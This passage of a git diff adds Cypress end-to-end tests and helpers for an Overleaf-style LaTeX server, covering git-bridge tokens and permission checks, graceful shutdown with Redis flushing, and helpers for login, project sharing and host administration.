from './helpers/project' + +import git from 'isomorphic-git' +import http from 'isomorphic-git/http/web' +import LightningFS from '@isomorphic-git/lightning-fs' +import { throttledRecompile } from './helpers/compile' + +describe('git-bridge', function () { + const ENABLED_VARS = { + GIT_BRIDGE_ENABLED: 'true', + GIT_BRIDGE_HOST: 'git-bridge', + GIT_BRIDGE_PORT: '8000', + V1_HISTORY_URL: 'http://sharelatex:3100/api', + } + + function gitURL(projectId: string) { + const url = new URL(Cypress.config().baseUrl!) + url.username = 'git' + url.pathname = `/git/${projectId}` + return url + } + + describe('enabled in Server Pro', function () { + if (isExcludedBySharding('PRO_CUSTOM_1')) return + startWith({ + pro: true, + vars: ENABLED_VARS, + }) + ensureUserExists({ email: 'user@example.com' }) + + function clearAllTokens() { + cy.get('button.linking-git-bridge-revoke-button').each(el => { + cy.wrap(el).click() + cy.findByText('Delete token').click() + }) + } + + function maybeClearAllTokens() { + cy.visit('/user/settings') + cy.findByText('Git Integration') + cy.get('button') + .contains(/Generate token|Add another token/) + .then(btn => { + if (btn.text() === 'Add another token') { + clearAllTokens() + } + }) + } + + beforeEach(function () { + login('user@example.com') + }) + + it('should render the git-bridge UI in the settings', () => { + maybeClearAllTokens() + cy.visit('/user/settings') + cy.findByText('Git Integration') + cy.get('button').contains('Generate token').click() + cy.get('code') + .contains(/olp_[a-zA-Z0-9]{16}/) + .as('newToken') + cy.findAllByText('Close').last().click() + cy.get('@newToken').then(token => { + // There can be more than one token with the same prefix when retrying + cy.findAllByText( + `${token.text().slice(0, 'olp_1234'.length)}${'*'.repeat(12)}` + ).should('have.length.at.least', 1) + }) + cy.get('button').contains('Generate token').should('not.exist') + cy.get('button').contains('Add another token').should('exist') + clearAllTokens() + cy.get('button').contains('Generate token').should('exist') + cy.get('button').contains('Add another token').should('not.exist') + }) + + it('should render the git-bridge UI in the editor', function () { + maybeClearAllTokens() + createProject('git').as('projectId') + cy.get('header').findByText('Menu').click() + cy.findByText('Sync') + cy.findByText('Git').click() + cy.findByTestId('git-bridge-modal').within(() => { + cy.get('@projectId').then(id => { + cy.get('code').contains(`git clone ${gitURL(id.toString())}`) + }) + cy.findByRole('button', { + name: 'Generate token', + }).click() + cy.get('code').contains(/olp_[a-zA-Z0-9]{16}/) + }) + + // Re-open + cy.url().then(url => cy.visit(url)) + cy.get('header').findByText('Menu').click() + cy.findByText('Git').click() + cy.findByTestId('git-bridge-modal').within(() => { + cy.get('@projectId').then(id => { + cy.get('code').contains(`git clone ${gitURL(id.toString())}`) + }) + cy.findByText('Generate token').should('not.exist') + cy.findByText(/generate a new one in Account Settings/) + cy.findByText('Go to settings') + .should('have.attr', 'target', '_blank') + .and('have.attr', 'href', '/user/settings') + }) + }) + + describe('git access', () => { + ensureUserExists({ email: 'collaborator-rw@example.com' }) + ensureUserExists({ email: 'collaborator-ro@example.com' }) + ensureUserExists({ email: 'collaborator-link-rw@example.com' }) + ensureUserExists({ email: 'collaborator-link-ro@example.com' }) + + let projectName: string + beforeEach(() => { + projectName = uuid() + 
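+        // Editorial sketch (not part of the original commit): gitURL() above
+        // embeds the fixed 'git' username, so clone URLs take this shape
+        // regardless of the configured base URL:
+        expect(gitURL('0123456789abcdef01234567').toString()).to.match(
+          /^https?:\/\/git@[^/]+\/git\/[a-f0-9]{24}$/
+        )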
createProject(projectName, { open: false }).as('projectId')
+      })
+
+      it('should expose r/w interface to owner', () => {
+        maybeClearAllTokens()
+        openProjectByName(projectName)
+        checkGitAccess('readAndWrite')
+      })
+
+      it('should expose r/w interface to invited r/w collaborator', () => {
+        shareProjectByEmailAndAcceptInviteViaDash(
+          projectName,
+          'collaborator-rw@example.com',
+          'Editor'
+        )
+        maybeClearAllTokens()
+        openProjectByName(projectName)
+        checkGitAccess('readAndWrite')
+      })
+
+      it('should expose r/o interface to invited r/o collaborator', () => {
+        shareProjectByEmailAndAcceptInviteViaDash(
+          projectName,
+          'collaborator-ro@example.com',
+          'Viewer'
+        )
+        maybeClearAllTokens()
+        openProjectByName(projectName)
+        checkGitAccess('readOnly')
+      })
+
+      it('should expose r/w interface to link-sharing r/w collaborator', () => {
+        openProjectByName(projectName)
+        enableLinkSharing().then(({ linkSharingReadAndWrite }) => {
+          const email = 'collaborator-link-rw@example.com'
+          login(email)
+          maybeClearAllTokens()
+          openProjectViaLinkSharingAsUser(
+            linkSharingReadAndWrite,
+            projectName,
+            email
+          )
+          checkGitAccess('readAndWrite')
+        })
+      })
+
+      it('should expose r/o interface to link-sharing r/o collaborator', () => {
+        openProjectByName(projectName)
+        enableLinkSharing().then(({ linkSharingReadOnly }) => {
+          const email = 'collaborator-link-ro@example.com'
+          login(email)
+          maybeClearAllTokens()
+          openProjectViaLinkSharingAsUser(
+            linkSharingReadOnly,
+            projectName,
+            email
+          )
+          checkGitAccess('readOnly')
+        })
+      })
+    })
+
+    function checkGitAccess(access: 'readOnly' | 'readAndWrite') {
+      const recompile = throttledRecompile()
+
+      cy.get('header').findByText('Menu').click()
+      cy.findByText('Sync')
+      cy.findByText('Git').click()
+      cy.get('@projectId').then(projectId => {
+        cy.findByTestId('git-bridge-modal').within(() => {
+          cy.get('code').contains(`git clone ${gitURL(projectId.toString())}`)
+        })
+        cy.findByRole('button', {
+          name: 'Generate token',
+        }).click()
+        cy.get('code')
+          .contains(/olp_[a-zA-Z0-9]{16}/)
+          .then(async tokenEl => {
+            const token = tokenEl.text()
+
+            // close Git modal
+            cy.findAllByText('Close').last().click()
+            // close editor menu
+            cy.get('.left-menu-modal-backdrop').click()
+
+            const fs = new LightningFS('fs')
+            const dir = `/${projectId}`
+
+            async function readFile(path: string): Promise<string> {
+              return new Promise((resolve, reject) => {
+                fs.readFile(path, { encoding: 'utf8' }, (err, blob) => {
+                  if (err) return reject(err)
+                  resolve(blob as string)
+                })
+              })
+            }
+
+            async function writeFile(path: string, data: string) {
+              return new Promise<void>((resolve, reject) => {
+                fs.writeFile(path, data, undefined, err => {
+                  if (err) return reject(err)
+                  resolve()
+                })
+              })
+            }
+
+            const commonOptions = {
+              dir,
+              fs,
+            }
+            const url = gitURL(projectId.toString())
+            url.username = '' // basic auth is specified separately.
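+            // Editorial note (assumption, not part of the original commit):
+            // isomorphic-git could alternatively take these credentials via
+            // its documented onAuth callback instead of a pre-built header:
+            //
+            //   const onAuth = () => ({ username: 'git', password: token })
+            //   await git.clone({ ...commonOptions, http, url: url.toString(), onAuth })
+            //
+            // This spec builds the HTTP Basic header by hand instead: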
+ const httpOptions = { + http, + url: url.toString(), + headers: { + Authorization: `Basic ${Buffer.from(`git:${token}`).toString('base64')}`, + }, + } + const authorOptions = { + author: { name: 'user', email: 'user@example.com' }, + committer: { name: 'user', email: 'user@example.com' }, + } + const mainTex = `${dir}/main.tex` + + // Clone + cy.then({ timeout: 10_000 }, async () => { + await git.clone({ + ...commonOptions, + ...httpOptions, + }) + }) + + cy.findByText(/\\documentclass/) + .parent() + .parent() + .then(async editor => { + const onDisk = await readFile(mainTex) + expect(onDisk.replaceAll('\n', '')).to.equal(editor.text()) + }) + + const text = ` +\\documentclass{article} +\\begin{document} +Hello world +\\end{document} +` + + // Make a change + cy.then(async () => { + await writeFile(mainTex, text) + await git.add({ + ...commonOptions, + filepath: 'main.tex', + }) + await git.commit({ + ...commonOptions, + ...authorOptions, + message: 'Swap main.tex', + }) + }) + + if (access === 'readAndWrite') { + // check history before push + cy.findAllByText('History').last().click() + cy.findByText('(via Git)').should('not.exist') + cy.findAllByText('Back to editor').last().click() + + cy.then(async () => { + await git.push({ + ...commonOptions, + ...httpOptions, + }) + }) + } else { + cy.then(async () => { + try { + await git.push({ + ...commonOptions, + ...httpOptions, + }) + expect.fail('push should have failed') + } catch (err) { + expect(err).to.match(/branches were not updated/) + expect(err).to.match(/forbidden/) + } + }) + + return // return early, below are write access bits + } + + // check push in editor + cy.findByText(/\\documentclass/) + .parent() + .parent() + .should('have.text', text.replaceAll('\n', '')) + + // Wait for history sync - trigger flush by toggling the UI + cy.findAllByText('History').last().click() + cy.findAllByText('Back to editor').last().click() + + // check push in history + cy.findAllByText('History').last().click() + cy.findByText(/Hello world/) + cy.findByText('(via Git)').should('exist') + + // Back to the editor + cy.findAllByText('Back to editor').last().click() + cy.findByText(/\\documentclass/) + .parent() + .parent() + .click() + .type('% via editor{enter}') + + // Trigger flush via compile + recompile() + + // Back into the history, check what we just added + cy.findAllByText('History').last().click() + cy.findByText(/% via editor/) + + // Pull the change + cy.then(async () => { + await git.pull({ + ...commonOptions, + ...httpOptions, + ...authorOptions, + }) + + expect(await readFile(mainTex)).to.equal(text + '% via editor\n') + }) + }) + }) + } + }) + + function checkDisabled() { + ensureUserExists({ email: 'user@example.com' }) + + it('should not render the git-bridge UI in the settings', () => { + login('user@example.com') + cy.visit('/user/settings') + cy.findByText('Git Integration').should('not.exist') + }) + it('should not render the git-bridge UI in the editor', function () { + login('user@example.com') + createProject('maybe git') + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText('Sync').should('not.exist') + cy.findByText('Git').should('not.exist') + }) + } + + describe('disabled in Server Pro', () => { + if (isExcludedBySharding('PRO_DEFAULT_1')) return + startWith({ + pro: true, + }) + checkDisabled() + }) + + describe('unavailable in CE', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + pro: false, + vars: ENABLED_VARS, + }) + 
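+    // Editorial note (sketch, not in the original commit): the point of this
+    // block is that CE ignores the git-bridge flags, i.e. roughly
+    //
+    //   const gitBridgeActive = pro && vars.GIT_BRIDGE_ENABLED === 'true'
+    //
+    // so even with ENABLED_VARS set, the disabled-UI assertions must pass: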
checkDisabled()
+  })
+})
diff --git a/server-ce/test/graceful-shutdown.spec.ts b/server-ce/test/graceful-shutdown.spec.ts
new file mode 100644
index 0000000..40dc144
--- /dev/null
+++ b/server-ce/test/graceful-shutdown.spec.ts
@@ -0,0 +1,95 @@
+import { ensureUserExists, login } from './helpers/login'
+import {
+  isExcludedBySharding,
+  STARTUP_TIMEOUT,
+  startWith,
+} from './helpers/config'
+import { dockerCompose, getRedisKeys } from './helpers/hostAdminClient'
+import { createProject } from './helpers/project'
+import { throttledRecompile } from './helpers/compile'
+
+const USER = 'user@example.com'
+const PROJECT_NAME = 'Old Project'
+
+function bringServerProBackUp() {
+  cy.log('bring server pro back up')
+  cy.then({ timeout: STARTUP_TIMEOUT }, async () => {
+    await dockerCompose('up', '--detach', '--wait', 'sharelatex')
+  })
+}
+
+describe('GracefulShutdown', function () {
+  if (isExcludedBySharding('PRO_CUSTOM_1')) return
+  startWith({
+    pro: true,
+    withDataDir: true,
+    resetData: true,
+  })
+  ensureUserExists({ email: USER })
+
+  let projectId: string
+  it('should display banner and flush changes out of redis', () => {
+    bringServerProBackUp()
+    login(USER)
+    createProject(PROJECT_NAME).then(id => {
+      projectId = id
+    })
+    const recompile = throttledRecompile()
+
+    cy.log('add additional content')
+    cy.findByText('\\maketitle').parent().click()
+    cy.findByText('\\maketitle').parent().type(`\n\\section{{}New Section}`)
+    recompile()
+
+    cy.log(
+      'check flush from frontend to backend: should include new section in PDF'
+    )
+    cy.get('.pdf-viewer').should('contain.text', 'New Section')
+
+    cy.log('should have unflushed content in redis before shutdown')
+    cy.then(async () => {
+      const keys = await getRedisKeys()
+      expect(keys).to.contain(`DocsIn:${projectId}`)
+      expect(keys).to.contain(`ProjectHistory:Ops:{${projectId}}`)
+    })
+
+    cy.log('trigger graceful shutdown')
+    let pendingShutdown: Promise<unknown>
+    cy.then(() => {
+      pendingShutdown = dockerCompose('stop', '--timeout=60', 'sharelatex')
+    })
+
+    cy.log('wait for banner')
+    cy.findByText(/performing maintenance/)
+    cy.log('wait for page reload')
+    cy.findByText(/is currently down for maintenance/)
+
+    cy.log('wait for shutdown to complete')
+    cy.then({ timeout: 60 * 1000 }, async () => {
+      await pendingShutdown
+    })
+
+    cy.log('should not have any unflushed content in redis after shutdown')
+    cy.then(async () => {
+      const keys = await getRedisKeys()
+      expect(keys).to.not.contain(`DocsIn:${projectId}`)
+      expect(keys).to.not.contain(`ProjectHistory:Ops:{${projectId}}`)
+    })
+
+    bringServerProBackUp()
+
+    cy.then(() => {
+      cy.visit(`/project/${projectId}?trick-cypress-into-page-reload=true`)
+    })
+
+    cy.log('check loading doc from mongo')
+    cy.findByText('New Section')
+
+    cy.log('check PDF')
+    cy.get('.pdf-viewer').should('contain.text', 'New Section')
+
+    cy.log('check history')
+    cy.findByText('History').click()
+    cy.findByText(/\\section\{New Section}/)
+  })
+})
diff --git a/server-ce/test/helpers/beforeWithReRunOnTestRetry.ts b/server-ce/test/helpers/beforeWithReRunOnTestRetry.ts
new file mode 100644
index 0000000..ce552c3
--- /dev/null
+++ b/server-ce/test/helpers/beforeWithReRunOnTestRetry.ts
@@ -0,0 +1,8 @@
+export function beforeWithReRunOnTestRetry(fn: () => void | Promise<unknown>) {
+  let ranOnce = false
+  beforeEach(() => {
+    if (ranOnce && Cypress.currentRetry === 0) return
+    ranOnce = true
+    return fn()
+  })
+}
diff --git a/server-ce/test/helpers/compile.ts b/server-ce/test/helpers/compile.ts
new file mode 100644
index 0000000..9f0c9e4
--- /dev/null
+++ b/server-ce/test/helpers/compile.ts
@@ -0,0 +1,40 @@
+/**
+ * Helper function for throttling clicks on the recompile button to avoid hitting server-side rate limits.
+ * The naive approach is waiting a fixed amount of time just before clicking the button.
+ * This helper takes into account that other UI interactions take time. That latency is deducted from the fixed delay (1s in this helper), which can bring the effective waiting time down to 0s.
+ */
+export function throttledRecompile() {
+  const { queueReset, recompile } = prepareWaitForNextCompileSlot()
+  queueReset()
+  return recompile
+}
+
+export function prepareWaitForNextCompileSlot() {
+  let lastCompile = 0
+  function queueReset() {
+    cy.then(() => {
+      lastCompile = Date.now()
+    })
+  }
+  function waitForCompileRateLimitCoolOff(triggerCompile: () => void) {
+    cy.then(() => {
+      cy.log('Wait for recompile rate-limit to cool off')
+      const msSinceLastCompile = Date.now() - lastCompile
+      cy.wait(Math.max(0, 1_000 - msSinceLastCompile))
+      queueReset()
+      triggerCompile()
+      cy.log('Wait for compile to finish')
+      cy.findByText('Recompile').should('be.visible')
+    })
+  }
+  function recompile() {
+    waitForCompileRateLimitCoolOff(() => {
+      cy.findByText('Recompile').click()
+    })
+  }
+  return {
+    queueReset,
+    waitForCompileRateLimitCoolOff,
+    recompile,
+  }
+}
diff --git a/server-ce/test/helpers/config.ts b/server-ce/test/helpers/config.ts
new file mode 100644
index 0000000..030e70c
--- /dev/null
+++ b/server-ce/test/helpers/config.ts
@@ -0,0 +1,64 @@
+import { reconfigure } from './hostAdminClient'
+import { resetActivateUserRateLimit, resetCreatedUsersCache } from './login'
+
+export const STARTUP_TIMEOUT =
+  parseInt(Cypress.env('STARTUP_TIMEOUT'), 10) || 120_000
+
+export function isExcludedBySharding(
+  shard:
+    | 'CE_DEFAULT'
+    | 'CE_CUSTOM_1'
+    | 'CE_CUSTOM_2'
+    | 'PRO_DEFAULT_1'
+    | 'PRO_DEFAULT_2'
+    | 'PRO_CUSTOM_1'
+    | 'PRO_CUSTOM_2'
+    | 'PRO_CUSTOM_3'
+) {
+  const SHARD = Cypress.env('SHARD')
+  return SHARD && shard !== SHARD
+}
+
+let previousConfigFrontend: string
+
+export function startWith({
+  pro = false,
+  version = 'latest',
+  vars = {},
+  varsFn = () => ({}),
+  withDataDir = false,
+  resetData = false,
+}) {
+  before(async function () {
+    Object.assign(vars, varsFn())
+    const cfg = JSON.stringify({
+      pro,
+      version,
+      vars,
+      withDataDir,
+      resetData,
+    })
+    if (resetData) {
+      resetCreatedUsersCache()
+      resetActivateUserRateLimit()
+      // no return here, always reconfigure when resetting data
+    } else if (previousConfigFrontend === cfg) {
+      return
+    }
+
+    this.timeout(STARTUP_TIMEOUT)
+    const { previousConfigServer } = await reconfigure({
+      pro,
+      version,
+      vars,
+      withDataDir,
+      resetData,
+    })
+    if (previousConfigServer !== cfg) {
+      await Cypress.session.clearAllSavedSessions()
+    }
+    previousConfigFrontend = cfg
+  })
+}
+
+export { reconfigure }
diff --git a/server-ce/test/helpers/email.ts b/server-ce/test/helpers/email.ts
new file mode 100644
index 0000000..036f746
--- /dev/null
+++ b/server-ce/test/helpers/email.ts
@@ -0,0 +1,39 @@
+/**
+ * Helper function for opening an email in the Roundcube-based mailtrap.
+ * We need to cross an origin boundary, which complicates the use of variables.
+ * Any variables must be passed in explicitly; the "runner" may only reference those and nothing from its enclosing scope.
+ * It is not possible to use Cypress helper functions, e.g. from the testing library, or other functions like "activateUser", inside the "runner".
+ * REF: https://github.com/testing-library/cypress-testing-library/issues/221
+ */
+export function openEmail<T>(
+  subject: string | RegExp,
+  runner: (frame: Cypress.Chainable<JQuery<HTMLElement>>, args: T) => void,
+  args?: T
+) {
+  const runnerS = runner.toString()
+  cy.origin(
+    Cypress.env('MAILTRAP_URL') || 'http://mailtrap',
+    { args: { args, runnerS, subject } },
+    ({ args, runnerS, subject }) => {
+      cy.visit('/')
+      cy.get('input[name="_user"]').type('mailtrap')
+      cy.get('input[name="_pass"]').type('password-for-mailtrap')
+      cy.get('button[type="submit"]').click()
+      cy.url().then(url => {
+        if (!url.includes('?_task=login')) return
+        cy.log('mailtrap login is flaky in cypress, submit again')
+        cy.get('input[name="_pass"]').type('password-for-mailtrap')
+        cy.get('button[type="submit"]').click()
+      })
+      // Use force as the subject is partially hidden
+      cy.contains(subject).click({ force: true })
+      cy.log('wait for iframe loading')
+      cy.wait(1000)
+      cy.get('iframe[id="messagecontframe"]').then(frame => {
+        // runnerS='(frame, args) => { runner body }'. Extract the runnable function.
+        const runner = new Function('return ' + runnerS)()
+        runner(cy.wrap(frame.prop('contentWindow').document.body), args)
+      })
+    }
+  )
+}
diff --git a/server-ce/test/helpers/hostAdminClient.ts b/server-ce/test/helpers/hostAdminClient.ts
new file mode 100644
index 0000000..cafeaa2
--- /dev/null
+++ b/server-ce/test/helpers/hostAdminClient.ts
@@ -0,0 +1,92 @@
+const hostAdminURL = Cypress.env('HOST_ADMIN_URL') || 'http://host-admin'
+
+export async function dockerCompose(cmd: string, ...args: string[]) {
+  return await fetchJSON(`${hostAdminURL}/docker/compose/${cmd}`, {
+    method: 'POST',
+    body: JSON.stringify({
+      args,
+    }),
+  })
+}
+
+export async function reconfigure({
+  pro = false,
+  version = 'latest',
+  vars = {},
+  withDataDir = false,
+  resetData = false,
+}): Promise<{ previousConfigServer: string }> {
+  return await fetchJSON(`${hostAdminURL}/reconfigure`, {
+    method: 'POST',
+    body: JSON.stringify({
+      pro,
+      version,
+      vars,
+      withDataDir,
+      resetData,
+    }),
+  })
+}
+
+async function fetchJSON(
+  input: RequestInfo,
+  init?: RequestInit
+): Promise<any> {
+  if (init?.body) {
+    init.headers = { 'Content-Type': 'application/json' }
+  }
+  let res
+  for (let attempt = 0; attempt < 5; attempt++) {
+    try {
+      res = await fetch(input, init)
+      break
+    } catch {
+      await sleep(3_000)
+    }
+  }
+  if (!res) {
+    res = await fetch(input, init)
+  }
+  const { error, stdout, stderr, ...rest } = await res.json()
+  if (error) {
+    console.error(input, init, 'failed:', error)
+    if (stdout) console.log(stdout)
+    if (stderr) console.warn(stderr)
+    const err = new Error(error.message)
+    Object.assign(err, error)
+    throw err
+  }
+  return { stdout, stderr, ...rest }
+}
+
+export async function runScript({
+  cwd,
+  script,
+  args = [],
+}: {
+  cwd: string
+  script: string
+  args?: string[]
+}) {
+  return await fetchJSON(`${hostAdminURL}/run/script`, {
+    method: 'POST',
+    body: JSON.stringify({
+      cwd,
+      script,
+      args,
+    }),
+  })
+}
+
+export async function getRedisKeys() {
+  const { stdout } = await fetchJSON(`${hostAdminURL}/redis/keys`, {
+    method: 'GET',
+  })
+  return stdout.split('\n')
+}
+
+async function sleep(ms: number) {
+  return new Promise(resolve => {
+    setTimeout(resolve, ms)
+  })
+}
diff --git a/server-ce/test/helpers/login.ts b/server-ce/test/helpers/login.ts
new file mode 100644
index 0000000..fa95abe
--- /dev/null
+++ b/server-ce/test/helpers/login.ts
@@ -0,0 +1,113 @@
+import { runScript } from './hostAdminClient'
+
+const
DEFAULT_PASSWORD = 'Passw0rd!' + +const createdUsers = new Set() + +export function resetCreatedUsersCache() { + createdUsers.clear() +} + +export async function createMongoUser({ + email, + isAdmin = false, +}: { + email: string + isAdmin?: boolean +}) { + const t0 = Math.floor(Date.now() / 1000) + const { stdout } = await runScript({ + cwd: 'services/web', + script: 'modules/server-ce-scripts/scripts/create-user.js', + args: [`--email=${email}`, `--admin=${isAdmin}`], + }) + const [url] = stdout.match(/http:\/\/.+\/user\/activate\?token=\S+/)! + const userId = new URL(url, location.origin).searchParams.get('user_id')! + const signupDate = parseInt(userId.slice(0, 8), 16) + if (signupDate < t0) { + return { url, exists: true } + } + return { url, exists: false } +} + +export function ensureUserExists({ + email, + password = DEFAULT_PASSWORD, + isAdmin = false, +}: { + email: string + password?: string + isAdmin?: boolean +}) { + let url: string + let exists: boolean + before(async function () { + exists = createdUsers.has(email) + if (exists) return + ;({ url, exists } = await createMongoUser({ email, isAdmin })) + }) + before(function () { + if (exists) return + activateUser(url, password) + cy.then(() => { + createdUsers.add(email) + }) + }) +} + +export function login(username: string, password = DEFAULT_PASSWORD) { + cy.session( + [username, password], + () => { + cy.visit('/login') + cy.get('input[name="email"]').type(username) + cy.get('input[name="password"]').type(password) + cy.findByRole('button', { name: 'Login' }).click() + cy.url().should('contain', '/project') + }, + { + cacheAcrossSpecs: true, + async validate() { + // Hit a cheap endpoint that is behind AuthenticationController.requireLogin(). + cy.request({ url: '/user/personal_info', followRedirect: false }).then( + response => { + expect(response.status).to.equal(200) + } + ) + }, + } + ) +} + +let activateRateLimitState = { count: 0, reset: 0 } +export function resetActivateUserRateLimit() { + activateRateLimitState = { count: 0, reset: 0 } +} + +function handleActivateUserRateLimit() { + cy.then(() => { + activateRateLimitState.count++ + if (activateRateLimitState.reset < Date.now()) { + activateRateLimitState.reset = Date.now() + 65_000 + activateRateLimitState.count = 1 + } else if (activateRateLimitState.count >= 6) { + cy.wait(activateRateLimitState.reset - Date.now()) + activateRateLimitState.count = 1 + } + }) +} + +export function activateUser(url: string, password = DEFAULT_PASSWORD) { + handleActivateUserRateLimit() + + cy.session(url, () => { + cy.visit(url) + cy.url().then(url => { + if (url.includes('/login')) return + cy.url().should('contain', '/user/activate') + cy.get('input[name="password"]').type(password) + cy.findByRole('button', { name: 'Activate' }).click() + cy.url().should('contain', '/project') + }) + }) +} diff --git a/server-ce/test/helpers/project.ts b/server-ce/test/helpers/project.ts new file mode 100644 index 0000000..662327d --- /dev/null +++ b/server-ce/test/helpers/project.ts @@ -0,0 +1,251 @@ +import { login } from './login' +import { openEmail } from './email' +import { v4 as uuid } from 'uuid' + +export function createProject( + name: string, + { + type = 'Blank Project', + newProjectButtonMatcher = /new project/i, + open = true, + }: { + type?: 'Blank Project' | 'Example Project' + newProjectButtonMatcher?: RegExp + open?: boolean + } = {} +): Cypress.Chainable { + cy.url().then(url => { + if (!url.endsWith('/project')) { + cy.visit('/project') + } + }) + const interceptId = 
uuid() + let projectId = '' + if (!open) { + cy.then(() => { + // Register intercept just before creating the project, otherwise we might + // intercept a request from a prior createProject invocation. + cy.intercept( + { method: 'GET', url: /\/project\/[a-fA-F0-9]{24}$/, times: 1 }, + req => { + projectId = req.url.split('/').pop()! + // Redirect back to the project dashboard, effectively reload the page. + req.redirect('/project') + } + ).as(interceptId) + }) + } + cy.findAllByRole('button').contains(newProjectButtonMatcher).click() + // FIXME: This should only look in the left menu + cy.findAllByText(type).first().click() + cy.findByRole('dialog').within(() => { + cy.get('input').type(name) + cy.findByText('Create').click() + }) + if (open) { + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + waitForMainDocToLoad() + return cy + .url() + .should('match', /\/project\/[a-fA-F0-9]{24}/) + .then(url => url.split('/').pop()) + } else { + const alias = `@${interceptId}` // IDEs do not like computed values in cy.wait(). + cy.wait(alias) + return cy.then(() => projectId) + } +} + +export function openProjectByName(projectName: string) { + cy.visit('/project') + cy.findByText(projectName).click() + waitForMainDocToLoad() +} + +export function openProjectById(projectId: string) { + cy.visit(`/project/${projectId}`) + waitForMainDocToLoad() +} + +export function openProjectViaLinkSharingAsAnon(url: string) { + cy.visit(url) + waitForMainDocToLoad() +} + +export function openProjectViaLinkSharingAsUser( + url: string, + projectName: string, + email: string +) { + cy.visit(url) + cy.findByText(projectName) // wait for lazy loading + cy.contains(`as ${email}`) + cy.findByText('OK, join project').click() + waitForMainDocToLoad() +} + +export function openProjectViaInviteNotification(projectName: string) { + cy.visit('/project') + cy.findByText(projectName) + .parent() + .parent() + .within(() => { + cy.findByText('Join Project').click() + }) + cy.findByText('Open Project').click() + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + waitForMainDocToLoad() +} + +function shareProjectByEmail( + projectName: string, + email: string, + level: 'Viewer' | 'Editor' +) { + openProjectByName(projectName) + cy.findByText('Share').click() + cy.findByRole('dialog').within(() => { + cy.findByLabelText('Add people', { selector: 'input' }).type(`${email},`) + cy.findByLabelText('Add people', { selector: 'input' }) + .parents('form') + .within(() => { + cy.findByTestId('add-collaborator-select') + .click() + .then(() => { + cy.findByText(level).click() + }) + }) + cy.findByText('Invite').click({ force: true }) + cy.findByText('Invite not yet accepted.') + }) +} + +export function shareProjectByEmailAndAcceptInviteViaDash( + projectName: string, + email: string, + level: 'Viewer' | 'Editor' +) { + shareProjectByEmail(projectName, email, level) + + login(email) + openProjectViaInviteNotification(projectName) +} + +export function shareProjectByEmailAndAcceptInviteViaEmail( + projectName: string, + email: string, + level: 'Viewer' | 'Editor' +) { + shareProjectByEmail(projectName, email, level) + + login(email) + + openEmail(projectName, frame => { + frame.contains('View project').then(a => { + cy.log( + 'bypass target=_blank and navigate current browser tab/cypress-iframe to project invite' + ) + cy.visit(a.attr('href')!) 
+ }) + }) + cy.url().should('match', /\/project\/[a-f0-9]+\/invite\/token\/[a-f0-9]+/) + cy.findByText(/user would like you to join/) + cy.contains(new RegExp(`You are accepting this invite as ${email}`)) + cy.findByText('Join Project').click() + waitForMainDocToLoad() +} + +export function enableLinkSharing() { + let linkSharingReadOnly: string + let linkSharingReadAndWrite: string + const origin = new URL(Cypress.config().baseUrl!).origin + + waitForMainDocToLoad() + + cy.findByText('Share').click() + cy.findByText('Turn on link sharing').click() + cy.findByText('Anyone with this link can view this project') + .next() + .should('contain.text', origin + '/read') + .then(el => { + linkSharingReadOnly = el.text() + }) + cy.findByText('Anyone with this link can edit this project') + .next() + .should('contain.text', origin + '/') + .then(el => { + linkSharingReadAndWrite = el.text() + }) + + return cy.then(() => { + return { linkSharingReadOnly, linkSharingReadAndWrite } + }) +} + +export function waitForMainDocToLoad() { + cy.log('Wait for main doc to load; it will steal the focus after loading') + cy.get('.cm-content').should('contain.text', 'Introduction') +} + +export function openFile(fileName: string, waitFor: string) { + // force: The file-tree pane is too narrow to display the full name. + cy.findByTestId('file-tree').findByText(fileName).click({ force: true }) + + // wait until we've switched to the selected file + cy.findByText('Loading…').should('not.exist') + cy.findByText(waitFor) +} + +export function createNewFile() { + const fileName = `${uuid()}.tex` + + cy.log('create new project file') + cy.get('button').contains('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.get('input').clear() + cy.get('input').type(fileName) + cy.findByText('Create').click() + }) + // force: The file-tree pane is too narrow to display the full name. 
+  cy.findByTestId('file-tree').findByText(fileName).click({ force: true })
+
+  // wait until we've switched to the newly created empty file
+  cy.findByText('Loading…').should('not.exist')
+  cy.get('.cm-line').should('have.length', 1)
+
+  return fileName
+}
+
+export function toggleTrackChanges(state: boolean) {
+  cy.findByText('Review').click()
+  cy.get('.track-changes-menu-button').then(el => {
+    // when the menu is expanded it renders the `expand_more` icon,
+    // and the `chevron_right` icon when it's collapsed
+    if (!el.text().includes('expand_more')) {
+      el.click()
+    }
+  })
+
+  cy.findByText('Everyone')
+    .parent()
+    .within(() => {
+      cy.get('.form-check-input').then(el => {
+        if (el.prop('checked') === state) return
+
+        const id = uuid()
+        const alias = `@${id}`
+        cy.intercept({
+          method: 'POST',
+          url: '**/track_changes',
+          times: 1,
+        }).as(id)
+        if (state) {
+          cy.get('.form-check-input').check()
+        } else {
+          cy.get('.form-check-input').uncheck()
+        }
+        cy.wait(alias)
+      })
+    })
+  cy.contains('.toolbar-item', 'Review').click()
+}
diff --git a/server-ce/test/helpers/read-file.ts b/server-ce/test/helpers/read-file.ts
new file mode 100644
index 0000000..15d032e
--- /dev/null
+++ b/server-ce/test/helpers/read-file.ts
@@ -0,0 +1,52 @@
+import fs from 'fs'
+import path from 'path'
+import pdf from 'pdf-parse'
+import AdmZip from 'adm-zip'
+import { promisify } from 'util'
+
+const sleep = promisify(setTimeout)
+
+const MAX_ATTEMPTS = 15
+const POLL_INTERVAL = 500
+
+type ReadFileInZipArgs = {
+  pathToZip: string
+  fileToRead: string
+}
+
+export async function readFileInZip({
+  pathToZip,
+  fileToRead,
+}: ReadFileInZipArgs) {
+  let attempt = 0
+  while (attempt < MAX_ATTEMPTS) {
+    if (fs.existsSync(pathToZip)) {
+      const zip = new AdmZip(path.resolve(pathToZip))
+      const entry = zip
+        .getEntries()
+        .find(entry => entry.entryName === fileToRead)
+      if (entry) {
+        return entry.getData().toString('utf8')
+      } else {
+        throw new Error(`${fileToRead} not found in ${pathToZip}`)
+      }
+    }
+    await sleep(POLL_INTERVAL)
+    attempt++
+  }
+  throw new Error(`${pathToZip} not found`)
+}
+
+export async function readPdf(file: string) {
+  let attempt = 0
+  while (attempt < MAX_ATTEMPTS) {
+    if (fs.existsSync(file)) {
+      const dataBuffer = fs.readFileSync(path.resolve(file))
+      const { text } = await pdf(dataBuffer)
+      return text
+    }
